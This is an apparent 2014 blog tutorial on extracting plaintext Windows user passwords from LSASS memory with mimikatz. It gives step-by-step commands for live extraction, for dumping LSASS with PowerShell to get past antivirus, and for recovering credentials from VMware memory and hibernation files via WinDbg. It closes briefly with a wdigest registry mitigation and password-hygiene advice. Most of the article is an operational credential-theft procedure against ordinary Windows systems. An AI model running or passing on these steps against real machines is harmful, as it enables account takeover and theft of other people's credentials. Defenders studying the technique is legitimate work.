Posted on June 18, 2014 · Posted in Windows Server 2008 R2

How to Get Plain Text Passwords of Windows Users

In this article, written as a part of a series devoted to Windows systems security (in the last article we discussed the security issues of passwords stored in the GPP), we will learn quite a simple method to get unencrypted passwords of all the users working in a Windows system.

Disclaimer. The information and technologies described in this article shall be used as reference only and not to get access to the accounts, information and systems of the third parties.

The most of system administrators are sure that Windows does not store plain text user passwords, but their hashes instead. Though today there are a lot of tools able to extract password hashes from a system, it is safe to say that using a quite complicated password, not from a vocabulary, makes it almost impossible for a hacker to get it by a brute force or with a base of calculated hashes.

In fact, it is true, but there are different nuances related to the users logged in the system. The matter is that some system processes use unencrypted (or encrypted) passwords, not their hashes, in their service purposes.

For instance, HTTP Digest Authentication used to support SSO (Single Sign On) needs the user password along with its hash. Encrypted user passwords (passwords, instead of their hashes) are stored in the OS memory, and if to be more specific, in LSASS.EXE process. The problem is that password encryption is implemented with the standard Win32 functions LsaProtectMemory and LsaUnprotectMemory, which are used to encrypt/decrypt of some memory section. A tool of French developers mimikatz allows to obtain the encrypted data from the memory and decrypt them using LsaUnprotectMemory function and to display all accounts of users authorized in the system and their passwords (decrypted, plain text!).

You can download mimikatz here:

Info. Mimikatz is detected by the majority of antiviruses as a potentially unsafe software (a hacker tool).

Mimikatz allows to extract user passwords directly from the memory or from the memory dump of the PC.

How to Extract User Passwords from lsass.exe Online

  • Download and run Mimikatz.exe (there are x86 and x64 versions for the corresponding systems)
  • Run the following commands in the tool
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full

(the last command displays all accounts and passwords of the users, having sessions in this system). mimikatz get plaintext username and passwords logged windows user

As you can see, the tool has shown us the password of the user with the name user.

 Note. This method won’t work if there is a modern antivirus blocking the injection. In this case you will have to create a memory dump of this machine and extract the passwords for all user sessions on another PC. 

How to Get a User Password from Windows Memory Dump

The memory dump of the LSASS process can be obtained with Out-Minidump.ps1 function in PowerShell. Import Out-Minidump function into PoSh and create a memory dump of LSASS process:

Get-Process lsass | Out-Minidump

get minidump of lsass process with Powershell

The memory dump, in our example it is lsass_562.dmp (by default, it is saved in %windir%\system32 directory), has to be copied to another system with mimikatz and the following command should be run:

Mimikatz “sekurlsa::minidump lsass_592.dmp”

The next command provides the list of users working in the system and their plaintext passwords:

mimikatz # sekurlsa::logonPasswords

mimikatz # sekurlsa::logonPasswords

As you can see, it’s easy.

How to Get Passwords from Virtual Machine and Hibernation Files

Let’s move on. With some simple steps, a hacker can easily extract user passwords from the memory dump files, system hibernation files and virtual machine files .vmem (virtual machine page files and their snapshots).

To do it, you need the Debugging Tool for Windows (WinDbg) package, mimikatz itself and a utility to convert .vmem into a memory dump file (in Hyper-V, it can be vm2dmp.exe or MoonSols Windows Memory toolkit for VMWare vmem-files).

For example, to convert a vmem page file of a VMWare virtual machine into a dump, run this command:

bin2dmp.exe "wsrv2008r2-1.vmem" vmware.dmp

Import the dump into WinDbg (File -> Open Crash Dump), load the mimikatz library under the name mimilib.dll (choose the version according to the bitness of the system):

.load mimilib.dll

Find lsass.exe process in the dump:

!process 0 0 lsass.exe

Load windows dump in WinDbg

And finally, type

.process /r /p fffffa800e0b3b30

and get a list of Windows users and their passwords as plain text: get plaintext password of windows user

It is possible to get unencrypted passwords of Windows users with Mimikatz in the following systems, including those run in different versions of Hyper-V 2008/2012 and VMWare hypervisors:

  • Windows Server 2008 / 2008  R2
  • Windows Server 2012/ R2
  • Windows 7
  • Windows 8

Note. By the way, the mimikatz features have been already implemented into Metasploit Framework.

Can I Protect Myself From Acquiring My Password Via mimikatz?

As a temporary solution you can disable wdigest security provider in the registry. To do it, find Security Packages key in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and delete the line wdigest from the list of packages.

disable wdigest security package

However, it should be understood that the hacker having the corresponding rights for the registry can easily change the settings back.

Conclusions. Let’s remember the security essentials again:

  • Don’t use the same passwords for different services (especially, terminal ones, belonging to the third parties).
  • Think about the security of your passwords and data on the virtual machines in widely advertised clouds for you don’t know who else has access to the hypervisors and storage on which virtual machines are located.
  • Minimize the number of accounts on your systems having local administrator privileges.
  • Never enter servers and PCs available to other users with the domain administrator account.

Related Articles